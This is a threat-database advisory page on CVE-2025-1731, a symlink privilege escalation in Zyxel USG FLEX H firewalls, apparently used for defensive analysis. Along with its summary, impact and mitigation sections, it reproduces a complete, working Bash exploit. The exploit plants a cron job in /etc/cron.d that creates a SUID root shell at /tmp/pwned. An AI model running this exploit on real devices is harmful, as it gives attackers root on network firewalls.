Zyxel USG FLEX H series uOS 1.31 - Privilege Escalation
Zyxel USG FLEX H series uOS 1.31 - Privilege Escalation
AI Analysis
Technical Summary
The Zyxel USG FLEX H series uOS 1.31 privilege escalation vulnerability (CVE-2025-1731) exploits a flaw in the setuid root binary `/usr/sbin/fermion-wrapper` used in Zyxel USG FLEX H series firewalls. This binary improperly handles symbolic links in the `/tmp` directory when invoked with the `register-status` argument. Specifically, the `/tmp` directory lacks the sticky bit, allowing local users with shell access to create symbolic links that cause `fermion-wrapper` to write files at arbitrary locations with root privileges. By leveraging this, an attacker with low privileges (e.g., the `postgres` user) can overwrite critical system files or create malicious cron jobs that execute with root privileges. The provided exploit code, written in Bash, demonstrates creating a cron job file `/etc/cron.d/runme` that runs every minute to copy `/bin/sh` to `/tmp/pwned`, sets its SUID bit, and then removes the cron job. After approximately one hour, the attacker can execute `/tmp/pwned -p` to gain a root shell, effectively escalating privileges from a local low-privileged user to root. The vulnerability arises due to improper permission management and symbolic link following in a privileged binary, combined with insecure `/tmp` directory permissions. Although tested on Zyxel FLEX100H and FLEX200H devices with firmware version 1.31, other devices and firmware versions may also be vulnerable. No patch links are currently provided, and no known exploits are reported in the wild yet. The exploit requires local access to the device's shell but does not require user interaction beyond executing the exploit script. The vulnerability impacts confidentiality, integrity, and availability by allowing full system compromise.
Potential Impact
For European organizations using Zyxel USG FLEX H series firewalls, this vulnerability poses a significant risk. Successful exploitation allows attackers with local access to escalate privileges to root, potentially leading to full device compromise. This can result in unauthorized access to sensitive network traffic, manipulation or disruption of firewall rules, and persistent backdoors within critical network infrastructure. Given that these firewalls often protect enterprise and government networks, exploitation could lead to data breaches, network outages, or lateral movement within corporate environments. The lack of a sticky bit on `/tmp` and the presence of a setuid root binary exacerbate the risk. Although exploitation requires local access, attackers could leverage other vulnerabilities or social engineering to gain initial footholds. The delayed execution via cron job means detection windows exist but also that attackers can maintain stealth. The impact on confidentiality, integrity, and availability is high, as root access on a firewall device compromises the entire network perimeter security. Organizations relying on these devices should consider the risk of insider threats or attackers who have gained initial access to internal systems.
Mitigation Recommendations
1. Immediate mitigation involves restricting local shell access to trusted users only and monitoring for unusual cron jobs or file changes in `/etc/cron.d/` and `/tmp/`. 2. Apply strict permissions on the `/tmp` directory by enabling the sticky bit (`chmod +t /tmp`) to prevent unauthorized symbolic link exploitation. 3. Disable or restrict the use of the vulnerable `/usr/sbin/fermion-wrapper` binary if possible until a vendor patch is available. 4. Implement host-based intrusion detection systems (HIDS) to alert on creation of suspicious files or SUID binaries like `/tmp/pwned`. 5. Regularly audit firewall firmware versions and subscribe to Zyxel security advisories for timely patch releases. 6. Use network segmentation to limit access to firewall management interfaces and reduce the risk of local exploitation. 7. Employ multi-factor authentication and strong access controls for device management to prevent unauthorized shell access. 8. If feasible, replace vulnerable devices or firmware versions with updated, patched alternatives. 9. Monitor logs for unexpected executions of `fermion-wrapper` or cron jobs and conduct periodic integrity checks on critical system files.
Affected Countries
Germany, France, United Kingdom, Italy, Spain, Netherlands, Poland, Belgium, Sweden, Austria
Indicators of Compromise
- exploit-code: # Exploit Title: Zyxel USG FLEX H series uOS 1.31 - Privilege Escalation # Date: 2025-04-23 # Exploit Author: Marco Ivaldi # Vendor Homepage: https://www.zyxel.com/ # Version: Zyxel uOS V1.31 (see https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-= =3D advisory-for-incorrect-permission-assignment-and-improper-privilege-managem= =3D ent-vulnerabilities-in-usg-flex-h-series-firewalls-04-22-2025) # Tested on: Zyxel FLEX100H with Firmware V1.31(ABXF.0) and Zyxel FLEX200H with Firmware V1.31(ABWV.0) # CVE: CVE-2025-1731 #!/bin/sh # # raptor_fermion - Zyxel fermion-wrapper root LPE exploit # Copyright (c) 2025 Marco Ivaldi <raptor@0xdeadbeef.info> # # "So we wait, this is our labour... we wait." # -- Anthony Swofford on fuzzing # # The setuid root binary program `/usr/sbin/fermion-wrapper` distributed by # Zyxel with some of their appliances follows symbolic links in the `/tmp` # directory when run with the `register-status` argument. This allows local # users with access to a Linux OS shell to trick the program into creating # writable files at arbitrary locations in the filesystem. This vulnerability # can be exploited to overwrite arbitrary files or locally escalate privileges # from low-privileged user (e.g., `postgres`) to root. # # Note: the `/tmp` directory doesn't have the sticky bit set, which simplifies # exploitation of this vulnerability and may also cause all sorts of havoc. # # ## Vulnerability information # # * CVE ID - CVE-2025-1731 # * High - 7.8 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H # * CWE-61 - https://cwe.mitre.org/data/definitions/61.html # # ## Relevant links # # * https://github.com/hnsecurity/vulns/blob/main/HNS-2025-10-zyxel-fermion.txt # * https://security.humanativaspa.it/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731 # * https://0xdeadc0de.xyz/blog/cve-2025-1731_cve-2025-1732 # * https://security.humanativaspa.it/tag/zyxel/ # # ## Usage example # # ``` # $ ./raptor_fermion # raptor_fermion - Zyxel fermion-wrapper root LPE exploit # Copyright (c) 2025 Marco Ivaldi <raptor@0xdeadbeef.info> # # [*] Exploiting /usr/sbin/fermion-wrapper # $ uname -a # Linux FLEX100H-HackerHood 4.14.207-10.3.7.0-2 #5 SMP PREEMPT Thu Jan 9 04:34:58 UTC 2025 aarch64 GNU/Linux # $ id # uid=502(postgres) gid=502(postgres) groups=502(postgres) # $ ls -l /usr/sbin/fermion-wrapper # -rwsr-xr-x 1 root root 44288 Jan 9 05:34 /usr/sbin/fermion-wrapper # {"status": 0, "registered": 1, "nebula_registered": 1, "bundle": 1} # # [+] Everything looks good \o/, wait an hour and check /tmp/pwned # $ ls -l /etc/cron.d/runme # -rw-rw-rw- 1 root postgres 79 Feb 14 15:52 /etc/cron.d/runme # $ cat /etc/cron.d/runme # * * * * * cp /bin/sh /tmp/pwned; chmod 4755 /tmp/pwned; rm /etc/cron.d/runme # # [+] Run the shell as follows to bypass bash checks: /tmp/pwned -p # # [about one hour later...] # # $ ls -l /tmp/pwned # -rwsr-xr-x 1 root root 916608 Feb 14 16:25 /tmp/pwned # $ /tmp/pwned -p # # id # uid=502(postgres) gid=502(postgres) euid=0(root) groups=502(postgres) # # R00t D4nc3!!!111! \o/ # ``` # # ## Tested on # # * Zyxel FLEX100H with Firmware V1.31(ABXF.0) | 2025-01-09 04:35:47 # * Zyxel FLEX200H with Firmware V1.31(ABWV.0) | 2025-01-09 05:11:31 # # *Note: other products and firmware versions may also be vulnerable.* # # ## Special thanks # # * Alessandro Sgreccia (@rainpwn) of HackerHood for his research and devices # echo "raptor_fermion - Zyxel fermion-wrapper root LPE exploit" echo "Copyright (c) 2025 Marco Ivaldi <raptor@0xdeadbeef.info>" echo target="/usr/sbin/fermion-wrapper" tmpfile="/tmp/register_status" runme="/etc/cron.d/runme" shell="/tmp/pwned" echo "[*] Exploiting $target" echo "$ uname -a" uname -a echo "$ id" id echo "$ ls -l $target" ls -l $target umask 0 rm $tmpfile ln -s $runme /tmp/register_status $target register-status echo "* * * * * cp /bin/sh $shell; chmod 4755 $shell; rm $runme" > $runme if [ "`cat $runme 2>/dev/null`" = "" ]; then echo "[!] Error: something went wrong ¯\\_(ツ)_/¯" exit 1 fi echo echo "[+] Everything looks good \\o/, wait an hour and check $shell" echo "$ ls -l $runme" ls -l $runme echo "$ cat $runme" cat $runme echo echo "[+] Run the shell as follows to bypass bash checks: $shell -p" echo
Zyxel USG FLEX H series uOS 1.31 - Privilege Escalation
Description
Zyxel USG FLEX H series uOS 1.31 - Privilege Escalation
AI-Powered Analysis
Technical Analysis
The Zyxel USG FLEX H series uOS 1.31 privilege escalation vulnerability (CVE-2025-1731) exploits a flaw in the setuid root binary `/usr/sbin/fermion-wrapper` used in Zyxel USG FLEX H series firewalls. This binary improperly handles symbolic links in the `/tmp` directory when invoked with the `register-status` argument. Specifically, the `/tmp` directory lacks the sticky bit, allowing local users with shell access to create symbolic links that cause `fermion-wrapper` to write files at arbitrary locations with root privileges. By leveraging this, an attacker with low privileges (e.g., the `postgres` user) can overwrite critical system files or create malicious cron jobs that execute with root privileges. The provided exploit code, written in Bash, demonstrates creating a cron job file `/etc/cron.d/runme` that runs every minute to copy `/bin/sh` to `/tmp/pwned`, sets its SUID bit, and then removes the cron job. After approximately one hour, the attacker can execute `/tmp/pwned -p` to gain a root shell, effectively escalating privileges from a local low-privileged user to root. The vulnerability arises due to improper permission management and symbolic link following in a privileged binary, combined with insecure `/tmp` directory permissions. Although tested on Zyxel FLEX100H and FLEX200H devices with firmware version 1.31, other devices and firmware versions may also be vulnerable. No patch links are currently provided, and no known exploits are reported in the wild yet. The exploit requires local access to the device's shell but does not require user interaction beyond executing the exploit script. The vulnerability impacts confidentiality, integrity, and availability by allowing full system compromise.
Potential Impact
For European organizations using Zyxel USG FLEX H series firewalls, this vulnerability poses a significant risk. Successful exploitation allows attackers with local access to escalate privileges to root, potentially leading to full device compromise. This can result in unauthorized access to sensitive network traffic, manipulation or disruption of firewall rules, and persistent backdoors within critical network infrastructure. Given that these firewalls often protect enterprise and government networks, exploitation could lead to data breaches, network outages, or lateral movement within corporate environments. The lack of a sticky bit on `/tmp` and the presence of a setuid root binary exacerbate the risk. Although exploitation requires local access, attackers could leverage other vulnerabilities or social engineering to gain initial footholds. The delayed execution via cron job means detection windows exist but also that attackers can maintain stealth. The impact on confidentiality, integrity, and availability is high, as root access on a firewall device compromises the entire network perimeter security. Organizations relying on these devices should consider the risk of insider threats or attackers who have gained initial access to internal systems.
Mitigation Recommendations
1. Immediate mitigation involves restricting local shell access to trusted users only and monitoring for unusual cron jobs or file changes in `/etc/cron.d/` and `/tmp/`. 2. Apply strict permissions on the `/tmp` directory by enabling the sticky bit (`chmod +t /tmp`) to prevent unauthorized symbolic link exploitation. 3. Disable or restrict the use of the vulnerable `/usr/sbin/fermion-wrapper` binary if possible until a vendor patch is available. 4. Implement host-based intrusion detection systems (HIDS) to alert on creation of suspicious files or SUID binaries like `/tmp/pwned`. 5. Regularly audit firewall firmware versions and subscribe to Zyxel security advisories for timely patch releases. 6. Use network segmentation to limit access to firewall management interfaces and reduce the risk of local exploitation. 7. Employ multi-factor authentication and strong access controls for device management to prevent unauthorized shell access. 8. If feasible, replace vulnerable devices or firmware versions with updated, patched alternatives. 9. Monitor logs for unexpected executions of `fermion-wrapper` or cron jobs and conduct periodic integrity checks on critical system files.
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Edb Id
- 52293
- Has Exploit Code
- true
- Code Language
- bash
Indicators of Compromise
Exploit Source Code
Exploit code for Zyxel USG FLEX H series uOS 1.31 - Privilege Escalation
# Exploit Title: Zyxel USG FLEX H series uOS 1.31 - Privilege Escalation # Date: 2025-04-23 # Exploit Author: Marco Ivaldi # Vendor Homepage: https://www.zyxel.com/ # Version: Zyxel uOS V1.31 (see https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-= =3D advisory-for-incorrect-permission-assignment-and-improper-privilege-managem= =3D ent-vulnerabilities-in-usg-flex-h-series-firewalls-04-22-2025) # Tested on: Zyxel FLEX100H with Firmware V1.31(ABXF.0) and Zyxel FLEX200H wi... (3783 more characters)
Threat ID: 68489dd87e6d765d51d5353f
Added to database: 6/10/2025, 9:04:24 PM
Last enriched: 6/11/2025, 9:13:40 PM
Last updated: 8/15/2025, 2:24:01 AM
Views: 16
Related Threats
U.S. CISA adds N-able N-Central flaws to its Known Exploited Vulnerabilities catalog - Security Affairs
MediumU.S. CISA adds Microsoft Internet Explorer, Microsoft Office Excel, and WinRAR flaws to its Known Exploited Vulnerabilities catalog
MediumCisco ISE 3.0 - Remote Code Execution (RCE)
CriticalCisco ISE 3.0 - Authorization Bypass
Mediumprojectworlds Online Admission System 1.0 - SQL Injection
MediumActions
Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.